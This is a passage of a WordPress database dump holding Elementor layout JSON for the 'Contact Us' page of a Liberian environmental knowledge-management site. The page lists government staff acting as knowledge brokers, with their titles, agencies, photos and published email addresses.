href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24548,3624,'_elementor_edit_mode','builder'),(24549,3624,'_elementor_template_type','wp-page'),(24550,3624,'_elementor_version','3.0.16'),(24551,3624,'_wp_page_template','default'),(24552,3624,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\